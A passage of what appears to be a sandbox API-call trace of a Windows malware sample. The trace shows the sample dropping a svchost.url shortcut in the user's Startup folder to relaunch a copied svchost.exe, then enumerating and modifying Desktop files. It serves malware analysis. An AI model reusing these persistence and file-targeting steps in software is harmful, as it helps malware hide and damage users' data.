Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x23e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x50 [0077.884] CoTaskMemAlloc (cb=0x20c) returned 0xd57ef0 [0077.884] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xd57ef0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0077.885] CoTaskMemFree (pv=0xd57ef0) [0077.885] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x23e7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0077.989] CoTaskMemAlloc (cb=0x20c) returned 0xd57ef0 [0077.989] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0xd57ef0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0077.989] CoTaskMemFree (pv=0xd57ef0) [0077.989] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x50 [0077.989] GetCurrentProcessId () returned 0xed8 [0077.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12620b70, Length=0x20000, ResultLength=0x23ee40 | out: SystemInformation=0x12620b70, ResultLength=0x23ee40*=0x11b00) returned 0x0 [0078.015] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url", nBufferLength=0x105, lpBuffer=0x23e730, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url", lpFilePart=0x0) returned 0x5c [0078.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec48) returned 1 [0078.017] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\svchost.url"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x23c [0078.023] GetFileType (hFile=0x23c) returned 0x1 [0078.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ebb8) returned 1 [0078.023] GetFileType (hFile=0x23c) returned 0x1 [0078.024] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0078.035] WriteFile (in: hFile=0x23c, lpBuffer=0x2507858*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x23ece8, lpOverlapped=0x0 | out: lpBuffer=0x2507858*, lpNumberOfBytesWritten=0x23ece8*=0x96, lpOverlapped=0x0) returned 1 [0078.037] CloseHandle (hObject=0x23c) returned 1 [0078.157] GetLogicalDrives () returned 0x4 [0078.161] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x23e670, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0078.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0078.357] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0078.359] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x652d4f80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x652d4f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a2b0 [0078.360] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x652d4f80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x652d4f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.361] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0xe75bdff0, ftLastWriteTime.dwHighDateTime=0x1d9741a, nFileSizeHigh=0x0, nFileSizeLow=0x887, dwReserved0=0x0, dwReserved1=0x0, cFileName="1YPPAA.jpg", cAlternateFileName="")) returned 1 [0078.361] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x18583e30, ftLastWriteTime.dwHighDateTime=0x1d973c8, nFileSizeHigh=0x0, nFileSizeLow=0x149ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="5DZrM2msfwaj.xls", cAlternateFileName="5DZRM2~1.XLS")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0xcbb3af70, ftLastWriteTime.dwHighDateTime=0x1d9768c, nFileSizeHigh=0x0, nFileSizeLow=0x466f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6UV9xBZAU7ALhdXD5SwN.mp4", cAlternateFileName="6UV9XB~1.MP4")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0xdad16ef0, ftLastWriteTime.dwHighDateTime=0x1d97404, nFileSizeHigh=0x0, nFileSizeLow=0x1266b, dwReserved0=0x0, dwReserved1=0x0, cFileName="6XFeOIrP-7F1BPJ.mp3", cAlternateFileName="6XFEOI~1.MP3")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x699b1a00, ftLastWriteTime.dwHighDateTime=0x1d97531, nFileSizeHigh=0x0, nFileSizeLow=0x18cb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="8-6P.wav", cAlternateFileName="")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0xd06c8650, ftLastWriteTime.dwHighDateTime=0x1d9744c, nFileSizeHigh=0x0, nFileSizeLow=0xf64d, dwReserved0=0x0, dwReserved1=0x0, cFileName="9g0 rDMpBlzVC.swf", cAlternateFileName="9G0RDM~1.SWF")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50473680, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x50dfcd00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphaware.exe", cAlternateFileName="ALPHAW~1.EXE")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0xff631450, ftLastWriteTime.dwHighDateTime=0x1d96d68, nFileSizeHigh=0x0, nFileSizeLow=0x8f34, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-jf 0ya1RIcN.mp4", cAlternateFileName="C-JF0Y~1.MP4")) returned 1 [0078.364] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x2bbd27c0, ftLastWriteTime.dwHighDateTime=0x1d96f94, nFileSizeHigh=0x0, nFileSizeLow=0xfa6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZ6ivAAtP9f8.m4a", cAlternateFileName="CZ6IVA~1.M4A")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x1e323290, ftLastWriteTime.dwHighDateTime=0x1d97614, nFileSizeHigh=0x0, nFileSizeLow=0x6b61, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELJrj3fRtgYOpT3c_m.mp4", cAlternateFileName="ELJRJ3~1.MP4")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0xcd8c2700, ftLastWriteTime.dwHighDateTime=0x1d96ddb, nFileSizeHigh=0x0, nFileSizeLow=0x17d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="fWyG0v4r7aIxC.gif", cAlternateFileName="FWYG0V~1.GIF")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x884587a0, ftLastWriteTime.dwHighDateTime=0x1d968f3, nFileSizeHigh=0x0, nFileSizeLow=0x16bf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPAZp7HIeyfBa.avi", cAlternateFileName="IPAZP7~1.AVI")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0xc8474ef0, ftLastWriteTime.dwHighDateTime=0x1d96d09, nFileSizeHigh=0x0, nFileSizeLow=0x101d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf", cAlternateFileName="J99Z9M~1.PDF")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x82a38ef0, ftLastWriteTime.dwHighDateTime=0x1d97618, nFileSizeHigh=0x0, nFileSizeLow=0xb2e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf", cAlternateFileName="")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a645f0, ftCreationTime.dwHighDateTime=0x1d970cf, ftLastAccessTime.dwLowDateTime=0xa0f3fbd0, ftLastAccessTime.dwHighDateTime=0x1d971d4, ftLastWriteTime.dwLowDateTime=0xa0f3fbd0, ftLastWriteTime.dwHighDateTime=0x1d971d4, nFileSizeHigh=0x0, nFileSizeLow=0x115f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots", cAlternateFileName="")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x34677f10, ftLastWriteTime.dwHighDateTime=0x1d975a2, nFileSizeHigh=0x0, nFileSizeLow=0xb4b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf", cAlternateFileName="")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x2adc7f00, ftLastWriteTime.dwHighDateTime=0x1d96831, nFileSizeHigh=0x0, nFileSizeLow=0x4ad4, dwReserved0=0x0, dwReserved1=0x0, cFileName="KMPe82eGM5iAzO PVI.mp3", cAlternateFileName="KMPE82~1.MP3")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0xd86d5fb0, ftLastWriteTime.dwHighDateTime=0x1d97171, nFileSizeHigh=0x0, nFileSizeLow=0x6f76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKPZbzGpKYHPVsXosEp3.mp3", cAlternateFileName="MKPZBZ~1.MP3")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0xcabd79d0, ftLastWriteTime.dwHighDateTime=0x1d972c1, nFileSizeHigh=0x0, nFileSizeLow=0x3da4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNGJ sodzb1khxMh.mp4", cAlternateFileName="MNGJSO~1.MP4")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x98d5c7c0, ftLastWriteTime.dwHighDateTime=0x1d96c9e, nFileSizeHigh=0x0, nFileSizeLow=0x10070, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.xls", cAlternateFileName="")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x50250fa0, ftLastWriteTime.dwHighDateTime=0x1d9741d, nFileSizeHigh=0x0, nFileSizeLow=0xe42e, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf", cAlternateFileName="MXWMXP~1.SWF")) returned 1 [0078.365] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x990eef10, ftLastWriteTime.dwHighDateTime=0x1d97634, nFileSizeHigh=0x0, nFileSizeLow=0x2e18, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.png", cAlternateFileName="OAAQQJ~1.PNG")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0xe04cd250, ftLastWriteTime.dwHighDateTime=0x1d96cbd, nFileSizeHigh=0x0, nFileSizeLow=0x1045d, dwReserved0=0x0, dwReserved1=0x0, cFileName="OYZWN3-fBul2M9U.wav", cAlternateFileName="OYZWN3~1.WAV")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0xfe05c0b0, ftLastWriteTime.dwHighDateTime=0x1d974db, nFileSizeHigh=0x0, nFileSizeLow=0x3bb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv", cAlternateFileName="")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0xfca44b10, ftLastWriteTime.dwHighDateTime=0x1d9767f, nFileSizeHigh=0x0, nFileSizeLow=0x92f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv", cAlternateFileName="RMPQAV~1.MKV")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0xff802ae0, ftLastWriteTime.dwHighDateTime=0x1d9750b, nFileSizeHigh=0x0, nFileSizeLow=0x67da, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.xls", cAlternateFileName="S4XZHJ~1.XLS")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0xa0720140, ftLastAccessTime.dwHighDateTime=0x1d9755b, ftLastWriteTime.dwLowDateTime=0xa0720140, ftLastWriteTime.dwHighDateTime=0x1d9755b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA", cAlternateFileName="UKLSVP~1")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x627aa2b0, ftLastWriteTime.dwHighDateTime=0x1d97002, nFileSizeHigh=0x0, nFileSizeLow=0xd49, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vjc3e20l.jpg", cAlternateFileName="")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0xc5a4d90, ftLastWriteTime.dwHighDateTime=0x1d97656, nFileSizeHigh=0x0, nFileSizeLow=0x126a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.png", cAlternateFileName="VXBET5~1.PNG")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x88683230, ftLastWriteTime.dwHighDateTime=0x1d97525, nFileSizeHigh=0x0, nFileSizeLow=0xc7d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wd6KHPvLn hvANgS.mp3", cAlternateFileName="WD6KHP~1.MP3")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0xd9cd9ba0, ftLastWriteTime.dwHighDateTime=0x1d96d42, nFileSizeHigh=0x0, nFileSizeLow=0x3b8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.pps", cAlternateFileName="WQTDEE~1.PPS")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0xf3b0e690, ftLastWriteTime.dwHighDateTime=0x1d97313, nFileSizeHigh=0x0, nFileSizeLow=0x18881, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif", cAlternateFileName="XFJ_K_~1.GIF")) returned 1 [0078.366] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0078.366] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0078.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0078.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0078.386] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", lpFilePart=0x0) returned 0x25 [0078.390] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg", dwFileAttributes=0x80) returned 1 [0078.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0078.392] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1YPPAA.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\1yppaa.jpg"), fInfoLevelId=0x0, lpFileInformation=0x250b2e8 | out: lpFileInformation=0x250b2e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0xe75bdff0, ftLastWriteTime.dwHighDateTime=0x1d9741a, nFileSizeHigh=0x0, nFileSizeLow=0x887)) returned 1 [0078.392] SetThreadErrorMode (dwNewMode=0x0, 